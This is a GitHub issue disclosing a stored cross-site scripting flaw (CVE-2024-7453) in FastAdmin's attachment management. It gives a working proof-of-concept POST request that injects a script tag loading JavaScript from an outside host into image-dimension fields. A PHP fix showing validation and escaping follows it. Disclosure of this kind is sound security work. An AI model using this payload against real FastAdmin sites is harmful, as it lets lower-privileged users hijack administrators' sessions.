Hebing123 / cve


FastAdmin 1.5.0.20240328 Stored XSS Vulnerability #66

Open Hebing123 opened 3 months ago

Hebing123 commented 3 months ago

Summary

FastAdmin is a PHP backend development framework that is open-source under the Apache 2.0 license. It is designed for rapid development of backend systems, featuring a permission management system based on Auth verification, and offers a one-click generation of CRUD (Create, Read, Update, Delete) functionalities.

FastAdmin 1.5.0.20240328, a version of the FastAdmin framework, contains a stored cross-site scripting (XSS) vulnerability in the "General Management - Attachment Management" section of the backend. Administrators with access to attachment management (e.g., secondary administrators) can exploit this vulnerability to target users with higher privileges.

Details

The vulnerability can be exploited by an attacker who is able to modify the row.imagewidth and row.imageheight parameters of an attachment. The attacker crafts a payload containing malicious JavaScript, which is stored in the database. When an administrator with higher privileges views or edits the attachment, the script executes in the context of that administrator's session, potentially allowing the attacker to perform actions on the administrator's behalf. Note that when loading JavaScript from an external site, the host and the JavaScript file path should be kept as short as possible; if the value is too long, it may cause an SQL error.

Proof of Concept (POC)

POST /swdHGFizaW.php/general/attachment/edit/ids/8?dialog=1 HTTP/1.1
Host: 192.168.0.10:1081
Content-Length: 468
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.10:1081
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

row%5Bcategory%5D=unclassed&row%5Burl%5D=%2Fuploads%2F20240801%2F75790a6f1f4d22689599732a999dffc6.zip&row%5Bimagewidth%5D=%22%3E%3CsCRiPt%2FSrC%3D%2F%2Fxss.fb%2FtndM%3E&row%5Bimageheight%5D=%22%3E%3CsCRiPt%2FSrC%3D%2F%2Fxss.fb%2FtndM%3E&row%5Bimagetype%5D=zip&row%5Bimageframes%5D=0&row%5Bfilename%5D=check.zip&row%5Bfilesize%5D=1922&row%5Bmimetype%5D=application%2Fx-zip-compressed&row%5Bextparam%5D=&row%5Buploadtime%5D=2024-08-01+16%3A33%3A40&row%5Bstorage%5D=local
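As an added illustration for the fix side of this report (not FastAdmin's own code; the function names are hypothetical), the two server-side controls that close this class of bug: reject anything that is not a plausible dimension before it is stored, and escape the stored value as an HTML attribute on output. The constructed input mirrors the row[imagewidth] value from the request above.

```php
<?php
// Added example, not part of FastAdmin. Function names are hypothetical.
declare(strict_types=1);

/**
 * Input validation: an image dimension can only be a short run of digits.
 * Quotes, angle brackets and tag names are never a valid width or height,
 * so the edit request should be refused before anything reaches the database.
 */
function validateDimension(string $raw): ?int
{
    $raw = trim($raw);
    if ($raw === '' || !ctype_digit($raw) || strlen($raw) > 6) {
        return null; // caller rejects the request with a validation error
    }
    return (int) $raw;
}

/**
 * Output encoding (defense in depth): even a value that already sits in the
 * database is escaped as an attribute value, so the leading quote can no
 * longer terminate the attribute and the tag renders as literal text.
 */
function renderDimensionAttr(string $name, string $value): string
{
    return $name . '="'
        . htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8')
        . '"';
}

// Constructed demo input: the URL-decoded row[imagewidth] value from the report.
$decoded = urldecode('%22%3E%3CsCRiPt%2FSrC%3D%2F%2Fxss.fb%2FtndM%3E');

// A legitimate value passes, the payload is rejected (null).
var_dump(validateDimension('800'));
var_dump(validateDimension($decoded));

// Vulnerable pattern: raw value interpolated into markup, the quote closes
// the attribute and the rest becomes a new tag.
$vulnerable = 'width="' . $decoded . '"';
// Hardened: the same value, escaped, stays inside the attribute.
$hardened = renderDimensionAttr('width', $decoded);

echo $vulnerable, PHP_EOL;
echo $hardened, PHP_EOL;
```

Run with `php example.php`; the escaped line is what the attachment edit view should emit for any stored dimension, and the validator is what the edit action should apply to row[imagewidth] and row[imageheight] before saving.
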

Hebing123 commented 3 months ago

CVE-2024-7453